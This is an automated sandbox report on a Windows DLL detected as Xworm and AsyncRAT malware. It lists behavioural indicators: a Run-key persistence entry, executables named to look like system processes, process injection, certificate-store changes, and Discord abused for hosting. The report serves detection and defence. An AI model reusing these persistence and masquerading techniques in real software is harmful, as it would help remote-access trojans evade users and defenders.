Analysis Overview
SHA256
4a4f65427e016b3c5ae0d2517a69db5f1cdc7a43d2c0a7957e8da5d6f378f063
Threat Level: Known bad
The file ogg.dll was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Xworm
AsyncRat
Suspicious use of NtCreateUserProcessOtherParentProcess
Async RAT payload
Downloads MZ/PE file
Loads dropped DLL
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Checks installed software on the system
Adds Run key to start application
Drops file in System32 directory
Suspicious use of SetThreadContext
Drops file in Windows directory
Program crash
Enumerates physical storage devices
Unsigned PE
Suspicious behavior: AddClipboardFormatListener
NTFS ADS
Uses Task Scheduler COM API
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Enumerates system info in registry
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Modifies Internet Explorer settings
Checks processor information in registry
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SetWindowsHookEx
Suspicious use of UnmapMainImage
Scheduled Task/Job: Scheduled Task
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SendNotifyMessage
Delays execution with timeout.exe
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-22 05:58
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-22 05:58
Reported
2024-06-22 06:19
Platform
win11-20240611-en
Max time kernel
1226s
Max time network
1228s
Command Line
Signatures
AsyncRat
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 6964 created 640 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Xworm
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zip\7z.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000\Software\Microsoft\Windows\CurrentVersion\Run\$77-scchost = "C:\\Users\\Admin\\AppData\\Roaming\\$77-scchost.exe" | C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe | C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-scchost.exe | C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Roaming\MyData\DataLogs.conf | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\$77-scchost | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Setup.evtx | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77-aachost.exe.log | C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-TWinUI%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 6964 set thread context of 7456 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Resources\xworm fixed\1 | C:\Users\Admin\AppData\Local\Temp\7zip\7z.exe | N/A |
| File created | C:\Windows\Resources\xworm fixed\2 | C:\Users\Admin\AppData\Local\Temp\7zip\7z.exe | N/A |
| File opened for modification | C:\Windows\Resources\xworm fixed\2 | C:\Users\Admin\AppData\Local\Temp\7zip\7z.exe | N/A |
| File created | C:\Windows\Resources\xworm fixed\3 | C:\Users\Admin\AppData\Local\Temp\7zip\7z.exe | N/A |
| File opened for modification | C:\Windows\Resources\xworm fixed\3 | C:\Users\Admin\AppData\Local\Temp\7zip\7z.exe | N/A |
| File created | C:\Windows\Resources\xworm fixed\4 | C:\Users\Admin\AppData\Local\Temp\7zip\7z.exe | N/A |
| File opened for modification | C:\Windows\Tasks\SA.DAT | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\Resources\xworm fixed\1 | C:\Users\Admin\AppData\Local\Temp\7zip\7z.exe | N/A |
| File created | C:\Windows\Resources\xworm fixed\0 | C:\Users\Admin\AppData\Local\Temp\7zip\7z.exe | N/A |
| File opened for modification | C:\Windows\Resources\xworm fixed\0 | C:\Users\Admin\AppData\Local\Temp\7zip\7z.exe | N/A |
| File created | C:\Windows\Resources\xworm fixed.zip | C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key security queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key security queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\Explorer.EXE | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133635095582291813" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = 6024b221ea3a6910a2dc08002b30309dbb0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{35786D3C-B075-49B9-88DD-029876E11C01} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF = 0100000000000000b386e46e69c4da01 | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached | C:\Windows\System32\dllhost.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{23170F69-40C1-278A-1000-000100020000} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000038fb036c69c4da01 | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E61BF828-5E63-4287-BEF1-60B1A4FDE0E3} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 01000000000000004aff016c69c4da01 | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E2BF9676-5F8F-435C-97EB-11607A5BEDF7} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000074f1f56b69c4da01 | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{474C98EE-CF3D-41F5-80E3-4AAB0AB04301} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 01000000000000006821f26b69c4da01 | C:\Windows\System32\dllhost.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000050000001800000030f125b7ef471a10a5f102608c9eebac0a000000a0000000b474dbf787420341afbaf1b13dcd75cf64000000a000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000900444648b4cd1118b70080036b11a030300000078000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "6" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\LogicalViewMode = "3" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:PID = "2" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "48" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\Mode = "1" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" | C:\Windows\Explorer.EXE | N/A |
